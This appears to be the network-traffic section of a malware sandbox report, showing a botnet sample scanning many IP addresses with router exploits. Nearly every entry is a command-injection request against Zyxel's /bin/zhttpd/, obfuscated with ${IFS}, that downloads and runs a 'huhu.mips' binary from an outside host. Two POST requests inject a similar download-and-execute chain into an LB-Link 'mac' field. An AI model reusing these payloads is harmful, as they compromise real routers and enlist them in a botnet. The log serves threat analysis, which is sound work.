                                                Jan 29, 2024 07:08:01.617831945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7846192.168.2.235370469.243.199.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617871046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7847192.168.2.234212281.149.14.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617922068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7848192.168.2.2337646104.251.174.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.617955923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7849192.168.2.233457672.14.188.2258080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.488581896 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:02.607883930 CET355INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.14.0 (Ubuntu)
                                                Date: Mon, 29 Jan 2024 06:08:02 GMT
                                                Content-Type: text/html
                                                Content-Length: 182
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7850192.168.2.233688237.59.56.1248080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.577182055 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:02.785195112 CET540INHTTP/1.1 400 Bad Request
                                                Date: Mon, 29 Jan 2024 06:08:02 GMT
                                                Server: Apache
                                                Content-Length: 362
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7851192.168.2.2346518172.131.30.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.630992889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7852192.168.2.2335998151.154.148.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631033897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7853192.168.2.235390075.245.234.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631072044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7854192.168.2.2356090163.83.140.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631129980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7855192.168.2.2341914113.136.97.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631162882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7856192.168.2.235578839.29.153.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631206036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7857192.168.2.2349808176.132.63.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631228924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7858192.168.2.2357926186.27.12.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631295919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7859192.168.2.2357316102.227.106.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631326914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7860192.168.2.2339932222.57.164.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631381035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7861192.168.2.2340236129.17.100.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631427050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7862192.168.2.2349500195.4.172.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631458044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7863192.168.2.2345510165.90.62.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631493092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7864192.168.2.2358950113.143.138.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631546021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7865192.168.2.2357534154.49.53.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631587982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7866192.168.2.2354698109.139.155.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631630898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7867192.168.2.2339758199.4.0.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631689072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7868192.168.2.234429037.191.224.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.631716967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7869192.168.2.2344720141.75.237.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632075071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7870192.168.2.2343120213.157.255.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632119894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7871192.168.2.2355418199.49.185.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632174969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7872192.168.2.2350404194.49.16.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632198095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7873192.168.2.2353874151.12.212.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632231951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7874192.168.2.2350726143.9.76.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632270098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7875192.168.2.2359330157.128.255.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632320881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7876192.168.2.2346040210.168.161.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632355928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7877192.168.2.2354030211.115.71.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632399082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7878192.168.2.234131451.76.197.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632441998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7879192.168.2.2354776210.101.30.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632461071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7880192.168.2.234406237.70.169.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632536888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7881192.168.2.2358486176.170.229.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632594109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7882192.168.2.2340582118.170.227.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632638931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7883192.168.2.2353052165.201.55.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632690907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7884192.168.2.233907038.60.41.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632724047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7885192.168.2.2359876101.59.150.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632769108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7886192.168.2.2349764199.197.159.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632824898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7887192.168.2.235867669.68.158.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632844925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7888192.168.2.2338448139.145.152.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632905960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7889192.168.2.2349454165.114.45.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632917881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7890192.168.2.2344766129.84.164.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632953882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7891192.168.2.2333682173.91.177.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.632997036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7892192.168.2.2334644166.45.98.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633033037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7893192.168.2.2346218124.55.14.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633090019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7894192.168.2.2354818148.161.124.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633094072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7895192.168.2.2355894203.196.174.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633143902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7896192.168.2.233932293.116.157.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633203030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7897192.168.2.233899080.57.26.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633266926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7898192.168.2.233842262.6.143.63443
